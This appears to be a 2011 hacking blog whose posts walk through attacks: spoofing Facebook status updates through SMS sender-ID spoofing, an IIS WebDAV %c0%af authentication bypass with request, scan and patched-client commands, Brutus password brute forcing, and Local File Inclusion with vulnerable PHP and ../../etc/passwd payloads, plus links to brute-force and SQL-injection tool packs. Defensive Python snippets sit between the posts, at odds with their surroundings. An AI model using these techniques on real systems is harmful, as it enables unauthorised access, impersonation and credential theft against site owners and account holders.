Mar 28, 2011

Facebook Flaw - SMS spoofing

First, let us see what SMS spoofing is.

SMS spoofing is a relatively new technique which uses the short message service (SMS), available on most mobile phones, to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text.

There are many SMS spoofing sites available on the internet. For this tutorial I am going to use


!!SMS GLOBAL!!


Just go to the site and register; they will send the password to your mobile.


Then login to your account


Send the SMS to 9232232665, type the victim's mobile number in the "Sender ID From" text box, and type the status in the "Message" text box.

To make the trick work, the victim must have registered the number with Facebook; otherwise this will not work.


Hope Facebook will patch this loophole soon.


Note - This was posted for awareness and education only. I am not responsible for what you do with this information.


You can use any SMS spoofing site for this, e.g. Sneak Sms.


Happy hacking

Mar 26, 2011

___The webDAV___

 

webDAV, also known as Web-based Distributed Authoring and Versioning, is a set of methods based on the Hypertext Transfer Protocol (HTTP) that facilitates collaboration between users in editing and managing documents and files stored on World Wide Web servers. For more info go here.

Detection , Vulnerability checking and Exploitation

The first thing one should know about this vulnerability is that the IIS server is not exploitable if the root folder is protected. Also, if the root folder is protected, there is no way to determine if WebDAV is even enabled. That being said, if the root folder is not protected then it's time to break out the server and have some fun.

Detecting if WebDAV is enabled

Tested on 


►IIS 6.0/Windows 2003 Enterprise SP2
►IIS 5.1/Windows XP Pro SP2
►IIS 5.0/Windows 2000 SP4

Note: On IIS 6.0, WebDAV is disabled by default. On IIS 5.0 and 5.1, WebDAV is enabled by default and you must edit the registry to disable it.

The method of detection simply involves sending a PROPFIND request to the server. This is the same basic PROPFIND request we used in the http-iis-webdav-vuln.nse script:

PROPFIND / HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/xml
Content-Length: 298

<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:">
<prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop>
</propfind>

If WebDAV is enabled it will return something like "HTTP/1.1 207 Multi-Status".

If WebDAV has been disabled, it will return "HTTP/1.1 501 Not Supported".

Checking if a server is vulnerable

tested on (working)

► IIS 6.0/Windows 2003 Enterprise SP2
► IIS 5.1/Windows XP Pro SP2

Tested On (not working) 

►IIS 5.0/Windows 2000 SP4

The original script only used one type of check: it would first find a protected folder (/secret/) and then try inserting the %c0%af sequence after the first /. It would turn /secret/ into /%c0%afsecret/.

This works fine on IIS 6.0 but does not work at all on IIS 5.0/5.1. The trick with 5.1 is that the %c0%af sequence cannot be right after the / but must be somewhere in the middle of the folder name. This also works on IIS 6.0. I modified the script so that it uses the 5.1/6.0 check, turning /secret/ into /s%c0%afsecret/.

Finding a vulnerable server

The first thing we need to do is find a vulnerable server. Let's see how an nmap scan of a box with the updated script looks:

> ./nmap -T4 -p80 --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT
Interesting ports on xxx.xxx.xxx.xxx:
PORT   STATE SERVICE
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav

Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds

We found that WebDAV is enabled and there are 3 vulnerable folders.
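The scan above shows the attacker's view; the defender's counterpart is spotting the same overlong UTF-8 sequence in the web server's own logs. The following is an added example, not code from the original post or the nmap script: it flags IIS W3C log lines whose cs-uri-stem carries a %c0%af-style sequence (and WebDAV verbs, which a server that has WebDAV disabled should not be answering), and recovers the folder the request was really aimed at by removing the sequence. It assumes cs-uri-stem is logged percent-encoded as received; the log lines are constructed.

```python
# Added example, not code from the original post: flag the overlong UTF-8 trick
# the post describes (a %c0%af sequence dropped into a protected folder name)
# in IIS W3C-format log lines. Assumption: cs-uri-stem is logged
# percent-encoded as received. The log lines below are constructed.
import re
from urllib.parse import unquote_to_bytes

# 0xC0/0xC1 lead bytes are never valid in UTF-8: a two-byte sequence starting
# with them is an "overlong" encoding of an ASCII character (C0 AF = '/').
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}

SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2009-05-20 14:29:01 10.0.0.5 GET /index.html - 80 - 192.0.2.10 200
2009-05-20 14:29:02 10.0.0.5 PROPFIND /%c0%afsecret/ - 80 - 192.0.2.10 207
2009-05-20 14:29:03 10.0.0.5 GET /secret/password.txt - 80 - 192.0.2.10 401
2009-05-20 14:29:04 10.0.0.5 GET /priv%c0%afate/password.txt - 80 - 192.0.2.10 200
2009-05-20 14:29:05 10.0.0.5 PROPFIND / - 80 - 192.0.2.10 207
"""

def strip_overlong(uri):
    """Return (uri with overlong sequences removed, number of sequences found)."""
    stripped, count = OVERLONG.subn(b"", unquote_to_bytes(uri))
    return stripped.decode("latin-1"), count

def scan_log(text):
    """One finding per request that carries an overlong sequence or a WebDAV verb."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 10:
            continue
        method, uri, client, status = fields[3], fields[4], fields[8], fields[9]
        target, count = strip_overlong(uri)
        reasons = []
        if count:
            reasons.append(f"{count} overlong UTF-8 sequence(s), folder without them: {target}")
        if method in WEBDAV_METHODS:
            reasons.append(f"WebDAV verb {method}")
        if reasons:
            findings.append({"client": client, "method": method, "uri": uri,
                             "target": target, "status": status, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['method']} {f['uri']} HTTP {f['status']}: "
              + "; ".join(f["reasons"]))
```

A 200 on a request whose stripped path lands inside a protected folder is the line to act on; the 401 on the plain /secret/ path right before it shows the ACL working as intended.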

 

Exploiting it...!

Now you could just telnet to the host on port 80. For more fun, we will use a WebDAV client, cadaver.

The nice thing about cadaver is that it's open source. After hacking away at the cadaver-0.23.2 source for a while, there is a little patch that makes it quite easy to exploit a server. Check the patch itself for the gritty details, but basically it does the following:

1) Replace any "Depth: 0" header with "Depth: 1" (otherwise ls won't work)
2) Append the header "Translate: f" to every request (otherwise get and probably others won't work)
3) Insert the characters "%c0%af" into any URI request longer than 1 character.

Get the cadaver-0.23.2-h4x.patch and apply it to the cadaver-0.23.2 source from the cadaver website. Here are the commands:
> mkdir cadaver-h4x
> cd cadaver-h4x
> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
--snip--
> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
--snip--
> tar xzvf cadaver-0.23.2.tar.gz
--snip--
> cd cadaver-0.23.2/
> patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
> ./configure
--snip--
> make
--snip--

Now we should have a patched, compiled version of cadaver, so start it up against the server that was identified as having a vulnerable folder earlier:

 

> ./cadaver xxx.xxx.xxx.xxx

This should drop you to a “dav:/>” prompt. Now just cd into the vulnerable folder and check out what’s there:

dav:/> cd secret
dav:/secret/> ls
Listing collection `/secret/': succeeded.
        password.txt                           7  May 19 10:40
dav:/secret/> cat password.txt
Displaying `/secret/password.txt':
ron$pr0ns
dav:/secret/>

You got it now :D
Here’s a list of commands  that work with the patched cadaver on a vulnerable folder:

* CD
* LS
* MOVE
* PUT
* GET
* CAT
* DELETE



If you exploited an IIS server, let me know ;)

I am not the writer of this tutorial; it was only edited by me.

Happy Hacking


 

Brutus - The Brute Forcing Tool



- Intro -

1.What is Brutus?

Brutus is a well known and smart brute forcing tool. It is used by hackers/cr@(kers to brute force login passwords.

2.What can you do with it?


We can use it to brute force passwords for HTTP, FTP, POP3, Telnet, SMB (NetBIOS), NetBus, etc.


Download from = http://www.multiupload.com/1W36PPEEYN 
password  - hackingclass

Password List - Google It or go here

Understanding Brutus





Time for some cr@ckin...

==HTTP form==

This is the option you would use if you want to cr@(k into a website that has a field for a username and a password.

The first thing you want to do is open Brutus and select HTTP form, then click the Modify Sequence button. Once there, put the above link into the Target form field and click Learn Form Settings. From here, click the field name that is for the username (in this case it is userid); once you have selected it, click the Username button shown above the cookie information. That tells Brutus that this field is for the username. Then select the password field and click the Password button, then click Accept. Next, fill in the HTML Response field with the response the site gives when a login attempt fails. In this case the response is "You have entered a wrong Password or username." For this target we put that into the Primary response field. Once this is done, click OK, add the IP into the Target field and start the cr@(k.


==FTP== 
For cr@(king an FTP server, the default settings should remain as they are; make sure that the "Try to stay connected for unlimited attempts" box is ticked. Once you have selected your options, enter the IP and begin the cr@(k.


==Telnet==
The default settings will work, no modifying needed.
 

==Netbus==

NetBus is a trojan. Sometimes it asks for a username and password to connect to the host. This option is used for cr@(king a password-protected NetBus server.

==SMB (Netbios)==

If you happen to find yourself a target that has the NetBIOS port (139) open and has sharing enabled, but it needs a password, this is the option you would use. The default settings should work.
 

==POP3==

Same as FTP: the same settings will work; use the "Try to stay connected for unlimited attempts" option.


==Custom==

This is what you would use to set up a cr@(k for anything else you can think of. You need to find out what to put in each field once you click "Define sequence". These options will vary from target to target and victim to victim.
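Whatever the service, a tool run with "Try to stay connected for unlimited attempts" looks the same from the server side: a burst of failed logins from one client, sometimes followed by a success. The following is an added example, not code from the original post or from Brutus, that flags that pattern with a sliding window over an authentication log. The log format (epoch, service, client, user, result) is assumed and the lines are constructed.

```python
# Added example, not code from the original post: the server-side view of what a
# tool like Brutus produces when it "stays connected for unlimited attempts",
# a burst of failed logins from one client, flagged with a sliding window.
# The log format is assumed (epoch service client user result) and the lines
# below are constructed.
from collections import defaultdict, deque

SAMPLE_AUTH_LOG = """\
1300000000 ftp 198.51.100.7 admin FAIL
1300000001 ftp 198.51.100.7 admin FAIL
1300000002 ftp 198.51.100.7 admin FAIL
1300000003 ftp 198.51.100.7 admin FAIL
1300000004 ftp 198.51.100.7 admin FAIL
1300000005 ftp 198.51.100.7 admin OK
1300000010 http-form 203.0.113.9 bob FAIL
1300000020 http-form 192.0.2.33 alice OK
1300000700 http-form 203.0.113.9 bob FAIL
"""

def detect_bruteforce(text, threshold=5, window=60):
    """Return one alert per (client, service) that reaches `threshold` failed
    logins within `window` seconds; a success after the burst is recorded too."""
    records = sorted(line.split() for line in text.splitlines() if line.strip())
    failures = defaultdict(deque)   # (client, service) -> timestamps of recent failures
    alerts = {}
    for ts, service, client, user, result in records:
        ts, key = int(ts), (client, service)
        if result == "FAIL":
            recent = failures[key]
            recent.append(ts)
            while ts - recent[0] > window:          # forget failures outside the window
                recent.popleft()
            if len(recent) >= threshold and key not in alerts:
                alerts[key] = {"client": client, "service": service, "user": user,
                               "failures": len(recent), "first": recent[0], "last": ts,
                               "success_after": False}
        elif result == "OK" and key in alerts:
            # a success right after the burst means a guess worked: reset that account
            alerts[key]["success_after"] = True
            alerts[key]["user"] = user
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The two failures from 203.0.113.9 are 690 seconds apart, so they never meet the threshold inside a 60-second window; lowering the threshold or widening the window trades that silence for false positives on users who mistype.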


note - All information here is only for educational purposes. I am not responsible if it is used for illegal work.

Happy Hacking

Mar 19, 2011

Steganography - The Art Of Hiding Secret Message



Steganography is the art and science of writing hidden messages in such a way that no one apart from the sender and the receiver knows they exist. In simple words, it is the art of hiding our data. To know more about this visit This.

What is the difference between encryption and Steganography?


In encryption the attacker may know that two people are communicating with each other in a secret way.

If you use a steganography technique, no one knows that you are sharing secret data/information with one another.

In steganography our secret data is joined with some other data file, like an image file or a video file, so the attacker may not get a single clue that secret information is being shared between two people.

How to do this?

The tool we are going to use - Quick Stego

Password- hemalandsauravonly



Steps - 



1- The software will look something like this 


Now The real works begin 


Now click on Open and choose the image which we are going to use for the next steps.


Click on open 


You will see something like this


Now the text hiding part 


Make a notepad (txt) File with your secret message in it.

Then click on Open Text, browse to the txt file, then click on Open.



Now click on the HIDE TEXT button 


Now just save your image and voila, we have hidden the text in the photo.

now save it

Now Comes the decoding part .

This is very easy ...


Just open the image in the software


And we can see the text here
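The steps above hide and recover the text through the tool's buttons; what a tool of this kind typically does underneath is least-significant-bit (LSB) embedding. The following is an added example, not code from the original post and not Quick Stego's own code: it hides a message in the lowest bit of each cover sample behind a 4-byte length header, reads it back, and measures how little the cover changed. The cover is a constructed bytearray standing in for decoded pixel bytes.

```python
# Added example, not code from the original post and not Quick Stego's own code:
# least-significant-bit (LSB) embedding. The cover is a constructed bytearray of
# 8-bit samples standing in for decoded pixel bytes; a real tool would read them
# from a bitmap and write them back.
import struct

def embed(cover, message):
    """Return a copy of cover whose LSBs carry a 4-byte big-endian length + message."""
    payload = struct.pack(">I", len(message)) + message
    if len(payload) * 8 > len(cover):
        raise ValueError(f"cover too small: need {len(payload) * 8} samples")
    stego = bytearray(cover)
    i = 0
    for byte in payload:
        for shift in range(7, -1, -1):            # most significant bit first
            stego[i] = (stego[i] & 0xFE) | ((byte >> shift) & 1)
            i += 1
    return bytes(stego)

def extract(stego):
    """Read the length header from the first 32 LSBs, then that many message bytes."""
    def read_bytes(first_sample, n):
        out = bytearray()
        for k in range(n):
            value = 0
            for j in range(8):
                value = (value << 1) | (stego[first_sample + 8 * k + j] & 1)
            out.append(value)
        return bytes(out)
    (length,) = struct.unpack(">I", read_bytes(0, 4))
    return read_bytes(32, length)

def max_sample_change(cover, stego):
    """Largest change to any sample: LSB embedding moves a sample by at most 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))

# Constructed cover: a 1024-sample gradient, room for 124 message bytes.
COVER = bytes((i * 7) % 256 for i in range(1024))
SECRET = b"meet at the usual place"

if __name__ == "__main__":
    stego = embed(COVER, SECRET)
    print(extract(stego), max_sample_change(COVER, stego))
```

No sample moves by more than 1, which is why the picture looks unchanged to the eye; it is also why a steganalysis tool examines the LSB plane rather than the visible image, since plain-text bits no longer look like sensor noise.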



This is an article by Hemal Modi.


I heartily thank him for showing interest in this blog .


Happy hacking

Mar 13, 2011

◄---- Zombie computers ---►




What are zombie computers? 
Let's see if you can get it from this picture... This is only an example diagram to help you understand.

 
Now let me explain this in words.

A zombie computer is a system which has been hacked or compromised by a hacker without the knowledge of its owner. The computer can be remotely operated by the hacker to commit crimes using the compromised machine. The remote user controls the system to perform different malicious tasks like "Illegal Hosting", "Click Fraud", "Email Fraud and Bombing", "Performing DDoS attacks" etc.

A hacker's trojan or virus can turn an ordinary computer into a zombie computer. Zombie computers are often part of a botnet, or zombie network. This network is a collection of many zombie computers (which the hacker has compromised) which are used to commit destructive and dangerous cyber crimes.

The harms Explained..

Illegal hosting = This refers to the illegal hosting of phishing pages or viruses on the compromised computer. The hacker uses the compromised computer as a host on which he puts his phishing pages.
  
Click fraud = Click fraud occurs when a person, an automated script or a computer program imitates a legitimate web user who clicks on an ad. Attackers use zombies to commit click fraud against sites that display pay-per-click advertising.


DDoS attacks = With this attack the attacker attempts to make a computer resource unavailable to its owner or users... take it DOWN. Explained here



Email Fraud and Bombing = Email spamming is the most popular crime nowadays. The attacker sends an email promising that you have won $100000 and that to claim it you should contact +95647512. You call the number and the call receiver tells you to transfer some amount to his account, maybe $1000. You transfer it and then you are looted: he is rich, you are poor. This is mail fraud.


Bombing means sending a huge number of mails to an email account, making it unavailable to its rightful user.


Symptoms of a Zombie Computers 

Many owners of zombie computers are unaware that their precious computer is being used for some destructive crime. Some symptoms of zombie computers are:

  • You cannot access the main antivirus and firewall vendor sites.
  • You notice that your computer slows down.
  • High CPU usage.
  • Your firewall software stops running or becomes disabled.
  • Your anti-virus software becomes corrupted.
  • Your screensavers stop working.
  • Malfunctions in your computer.
====HOW TO BE SAFE====
You can also be smarter than the hackers with some knowledge and a working brain.

Changing the passwords - If your computer was a zombie, then the trojan or virus on it may have been sending out all the logs of your computer, including your keystrokes. Change all the passwords you used from that computer, like Gmail, PayPal, bank accounts etc.

Getting yourself a good antivirus - Buy yourself a good antivirus with features like anti-spyware and anti-malware. You can use Kaspersky, Quick Heal, NOD32 etc.

Update your programs - Update your computer and all the programs you use.

Run the antivirus scan daily - Scan your computer daily or once every 2 to 3 days.

Report the zombie - If you have discovered a zombie on your computer, immediately contact your ISP and inform them; they will help you trace back the hacker.


Keep scanning your computer for as long as you feel you are not secure.

Happy Hacking

Mar 8, 2011

Mozilla Firefox - The hacker's choice

Security testers and hackers have a lot of tools to play around with. But what if your browser helps you with this?

The magical browser is Mozilla Firefox, with the extensions/add-ons developed by professional ethical hackers and penetration testers.

In this article I will tell you some of the best add-ons of all time that hackers use.

Download Firefox from Google

Now back to topic

Social engineering add-on

People Search and Public Record : This Firefox extension is a very handy tool for investigators, hackers, legal professionals, and anyone interested in doing their own basic people searches and public record lookups as well as background research.

Google and Spider

Advanced dork : Gives quick access to Google's Advanced Dorks directly from the context menu. This could be used to scan for hidden files or narrow in on a target anonymously.

SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on HTTrack.

Editors (WEBMASTER)

JSView : The 'view page source' menu item now opens files based on the behaviour you choose in the JSView options. This allows you to open the source code of any web page in a new tab or in an external editor.

Firebug : Firebug integrates with Firefox to put a wealth of development tools at your hand while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.

XML Developer Toolbar : Allows XML developers to use standard tools all from the browser.


Headers manipulation and agent switcher

HeaderMonitor : This Firefox extension displays, in a status bar panel, any HTTP response header of the top-level document returned by a web server. Examples: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.

RefControl : Control what gets sent as the HTTP Referer on a per-site basis.

User Agent Switcher : Adds a menu and a toolbar button to switch the user agent of the browser.

Cookies manipulation/editors 

Add N Edit Cookies : Cookie editor that allows you to add and edit "session" and saved cookies.

httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as httpOnly on the browser side.

Allcookies : Dumps ALL cookies (including session cookies) to Firefox's standard cookies.txt file.

Security Tools

HackBar : This toolbar will help in testing SQL injections, XSS holes and site security. This tool will not help you to exploit the vulnerability or to learn hacking. Its main purpose is to help a hacker do security audits on his own code.

Tamper Data : Use Tamper Data to view and modify HTTP/HTTPS headers and POST parameters.

Chickenfoot : Chickenfoot is a Firefox extension that puts a programming environment in the browser's sidebar so you can write scripts to manipulate web pages and automate web browsing.

Proxy utilities

POW (Plain Old WebServer) : The Plain Old Webserver uses server-side JavaScript to run a server inside your browser. Use it to distribute files from your browser. It supports server-side JS, GET, POST, uploads, cookies, SQLite and AJAX. It has security features to password-protect your site. Users have created a wiki, chat room and search engine using SJS.

FoxyProxy : FoxyProxy is an advanced proxy management tool that completely replaces Firefox's proxy configuration. It offers more features than SwitchProxy, Proxy Button etc.

SwitchProxy : SwitchProxy lets you manage and switch between multiple proxy configurations quickly and easily. You can also use it as an anonymizer to protect your computer from prying eyes.

miscellaneous 

Hacks for fun 

Greasemonkey : Allows you to customize the way a webpage displays using small bits of JavaScript. Scripts can be downloaded at userscripts.

Mar 7, 2011

Local File Inclusion ( L F I )


In this article I will explain the web exploitation technique "Local File Inclusion".

What makes a website vulnerable to LFI?

A piece of PHP code makes a website vulnerable to LFI. Let's look at this code:

<?php
// Vulnerable: the page name comes straight from the query string and is included as-is.
$page = $_GET['page'];
include($page);
?>


This code must not be used anywhere in a PHP script, because $page is not sanitized and is passed directly to include(). Unfortunately, this code can be found many times in many popular websites.


Now we know why and how the webpage becomes vulnerable. So let's talk about the rest: using the vulnerability to our advantage.

Let us now see how this code gives us the ability to browse through the web server.

Now imagine that there is a file named saurav.php in the root directory of a website.
If you type
http://victim.com/root/saurav.php
you can access that file, right?

But if the piece of PHP code above is inside index.php, then we can include the file using
http://victim.com/index.php?page=root/saurav.php

If index.php was at victim.com/root/index.php and saurav.php at http://victim.com/saurav.php, you would have to type http://victim.com/test/index.php?page=../saurav.php. The ../ is called directory traversal and allows you to go up in the directories.


Now I think you understood this one. Let's move on.

Now we can access directories/files that the server doesn't allow. If it is hosted on a UNIX server then we can access the password files of the server; we will have to add ../ to cycle through the directories.
Example

http://site.com/index.php?page=../../etc/passwd
http://site.com/index.php?page=../../../../../../etc/passwd


How many ../ are needed depends on which directory the including script sits in relative to the passwd file.


If you don't know what to do with /etc/passwd, then read the full article.

/etc/passwd is where the users/passwords are stored. A non-shadowed passwd file will look like this:

username:passwd:UID:GID:full_name:directory:shell

For example:
username:SaurRavhAckingclass:503:100:FullName:/home/user name:/bin/sh

All you need to do then is get the username and decode the password. If the passwd file is shadowed then you'll see something like this:

username:x:503:100:FullName:/home/username:/bin/sh

Now you can see the password field is "x" and the encoded password is in /etc/shadow (you will probably not have access to /etc/shadow because it is only readable/writable by root, while /etc/passwd has to be readable by many processes; that's why you have access to it).

Here are some places that you can play with 
/etc/passwd
/etc/shadow
/etc/security/user
/etc/security/group
/etc/security/passwd
/etc/security/limits
/etc/security/environ
/etc/group
This site will help you more on /etc/passwd:

click here

There is another piece of code that may make a site vulnerable to LFI:

<?php
// Also vulnerable: appending .php does not stop traversal, and older PHP versions let a null byte truncate the path.
$page = $_GET["page"];
include("$page.php");
?>
 

In this case, as you can see, it will add .php to anything you include. So if you type
http://victim.com/index.php?page=../../../../etc/passwd

and it shows an error like "the file does not exist", you will have to apply a null byte ()

http://victim.com/index.php?page=../../../../etc/passwd

This null byte makes everything after it be ignored.
There are many other ways to exploit a website using LFI. We can use Perl scripts and many other things; I will discuss them some other day.
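The fix for both snippets above is the same: never let the request pick an arbitrary path, and refuse the tricks the article walks through (../ traversal, a null byte to drop the appended .php, absolute paths and stream wrappers) before anything reaches include(). The following is an added example, not code from the original post, written in Python rather than PHP so the checks can be exercised directly; PAGES_DIR and ALLOWED_PAGES are assumed values.

```python
# Added example, not code from the original post: the checks a safe replacement
# for include($_GET['page']) needs, written in Python rather than PHP.
# PAGES_DIR and ALLOWED_PAGES are assumed values; the request strings in the
# comments are the ones the post shows.
import os
from urllib.parse import unquote

PAGES_DIR = "/var/www/app/pages"               # assumed: the only directory pages may come from
ALLOWED_PAGES = {"index", "about", "contact"}  # assumed allowlist of page names

def reject_reason(page):
    """Return why a raw `page` value must be refused, or None if it passes every check."""
    page = unquote(page)            # %2e%2e%2f, %00 ... become what the include would see
    if "\x00" in page:              # ../../etc/passwd%00 : null byte to drop the appended .php
        return "null byte"
    if page.startswith(("/", "\\")) or (len(page) > 1 and page[1] == ":"):
        return "absolute path"
    if "://" in page:               # php://, data://, http:// stream wrappers
        return "stream wrapper"
    if ".." in page.replace("\\", "/").split("/"):   # ../../etc/passwd
        return "directory traversal"
    if page not in ALLOWED_PAGES:   # root/saurav and anything else not meant to be a page
        return "not in allowlist"
    return None

def resolve_page(page):
    """Map a page name to the file to include, or None when the request is refused.
    The allowlist alone already decides; the realpath check is defence in depth."""
    if reject_reason(page) is not None:
        return None
    base = os.path.realpath(PAGES_DIR)
    target = os.path.realpath(os.path.join(base, unquote(page) + ".php"))
    if os.path.commonpath([base, target]) != base:
        return None
    return target

if __name__ == "__main__":
    for raw in ("about", "../../etc/passwd", "../../../../etc/passwd%00", "root/saurav"):
        print(f"{raw!r:32} -> {reject_reason(raw) or resolve_page(raw)}")
```

The allowlist is the check that matters; the others exist so that a log of reject reasons tells you which of the article's tricks is being tried against the site.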

This article may be a little difficult for a beginner. Read it thoroughly and search Google for more on this.

Happy Hacking 


Credits - planet creator

Mar 3, 2011

WebSecurify-Web Penetration testing tool


If you own a website you also have to look after its security and check whether your website is vulnerable to some of the famous flaws like SQLi and XSS. Even script kiddies or a noob can hack your website if it is vulnerable to these flaws, using some kiddie tool; that is not a big deal for them.

You can check whether your website is vulnerable manually, but that is a waste of time for you all. This tool will help you do so without wasting your time.


WHAT DOES IT CHECK?

This tool checks for some of the popular web flaws, like:

  • SQL Injection
  • Local and Remote File Include
  • Cross-site Scripting
  • Cross-site Request Forgery
  • Information Disclosure Problems
  • Session Security Problems
  • And many other that are in OWASP TOP 10
Available Features
  • Available for all main operating systems (Windows, Mac OS, Linux)
  • Simple to use user interface(GUI)
  • Built-in internationalization support
  • Easily extensible with the help of add-ons and plugins
  • Exportable and customizable reports with any level of detail
  • Modular and reusable design
  • Powerful manual testing tools and helper facilities
  • Powerful analytical and scanning technology
  • Scriptable support for JavaScript and Python 
Official Video


Download From -
Windows - http://websecurify.googlecode.com/files/Websecurify%200.8.exe
Linux-http://websecurify.googlecode.com/files/Websecurify%200.8.tgz
Mac-http://websecurify.googlecode.com/files/Websecurify%200.8.dmg

Official Website

Mar 2, 2011

Reiluke Tool Collection

Hello all! How are you? I got this tool collection today. It is a really awesome collection of tools made by Reiluke.

This pack contains some of the hottest tools:
1-Admin Page Finder

2-Blind Sql injector

3-Cpanel Bruteforcer

4-Duplicate File Remover

5-Email Bruteforcer(Yahoo\Gmail/Hotmail)

6-Email Checker

7-RapidShare Checker

8-sqli helper (Sqli injection tool)

I will post its tutorial some day...
9-Exploit Scanner

10-Sqli Column counter


Download Link - CLICK HERE..
password - saurav

Happy hacking
